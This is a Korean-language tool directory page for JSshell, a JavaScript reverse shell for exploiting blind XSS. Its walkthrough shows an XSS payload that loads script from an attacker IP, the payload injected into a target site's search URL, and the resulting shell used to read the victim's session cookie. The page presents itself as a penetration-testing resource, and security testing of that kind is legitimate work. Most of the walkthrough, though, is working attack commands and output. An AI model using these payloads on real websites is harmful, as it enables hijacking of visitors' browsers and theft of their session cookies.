Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
JSshell — JSshell - JavaScript 리버스/원격 셸 | Kitploit
도구/GitHubGitHub/shelld3v/jsshell
Payload GenerationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubshelld3v/jsshell

JSshell

JSshell - JavaScript 리버스/원격 셸

저장소 보기
6311103년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

JSshell - 버전 3.1

JSshell

JSshell - JavaScript 리버스 셸입니다. 원격으로 JS 코드 실행, 블라인드 XSS 악용 등에 사용됩니다.

요구 사항: 모든 OS + Python 2 또는 Python 3

JSshell 버전 3.1의 새로운 기능

JSshell 3.1 새 버전에서 업데이트된 내용:

  • 새로운 JSshell 명령어: snippet -> 자바스크립트 코드 조각을 작성할 수 있게 해줍니다.
root@kitploit:~
>>> snippet
Use CTRL+D to finish the snippet

function new() {
    new = 'New update: Support javascript snippet =)';
    confirm(new)
}

new()
>>> 
  • 무음 모드 (전문가용)
  • <body> 리버스 셸 페이로드 추가
  • 일부 버그 수정

사용법

JS 리버스 셸 페이로드 생성: -g

리스닝 및 페이로드 생성을 위한 로컬 포트 번호 설정 (기본값: 4848): -p

페이로드 생성을 위한 로컬 소스 주소 설정 (기본값: 자동으로 IP 주소 감지): -s

셸 연결 타임아웃 설정 (사용자가 세션을 종료하면 셸이 영원히 일시 중지되므로, 타임아웃을 설정하면 시간 초과 후 셸이 닫힙니다): -w

셸 획득 후 명령어 실행: -c

사용 예시:

  • jsh.py
  • jsh.py -g
  • jsh.py -p 1234
  • jsh.py -s 48.586.1.23 -g
  • jsh.py -c "alert(document.cookie)" -w 10

JSshell 실행 예시:

JSshell 사용 방법에 대한 단계별 예시입니다.

먼저, 리버스 JS 셸 페이로드를 생성하고 셸 타임아웃을 설정합니다 (예: 20초):

root@kitploit:~
~# whoami
root
~# ls
README.md   jsh.py
~# python3 jsh.py -g -w 20
    __
  |(_  _ |_  _  |  |
\_|__)_> | |(/_ |  |
                      v1.0

Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>

Listening on [any] 4848 for incoming JS shell ...

이제 이 페이로드를 웹사이트에 붙여넣습니다:

https://vulnwebs1te.com/b/search?q=<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},1248)>

페이지에 접속하면 리버스 JS 셸을 얻을 수 있습니다:

root@kitploit:~
    __
  |(_  _ |_  _  |  |
\_|__)_> | |(/_ |  |
                      v1.0

Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>

Listening on [any] 4848 for incoming JS shell ...
Got JS shell from [75.433.24.128] port 39154 to DESKTOP-1GSL2O2 4848
$ established
$ the
$ shell
$
$
$ help
JSshell using javascript code as shell commands. Also supports some commands:
help                  This help
exit, quit            Exit the JS shell
$

몇 가지 명령어를 실행해 보겠습니다:

root@kitploit:~
$ var test = 'controlled'
$ confirm(test)
$

그러면 알림창이 나타납니다: controlled

root@kitploit:~
$ prompt(document.cookie)
$

그러면 브라우저가 사용자 쿠키를 출력합니다: JSESSION=3bda8...

root@kitploit:~
$ exit
~# whoami
root
~# pwd
/home/shelld3v
~#

이제 종료되었습니다!

저자

이 도구는 shelld3v가 만들었습니다!

도구 다운로드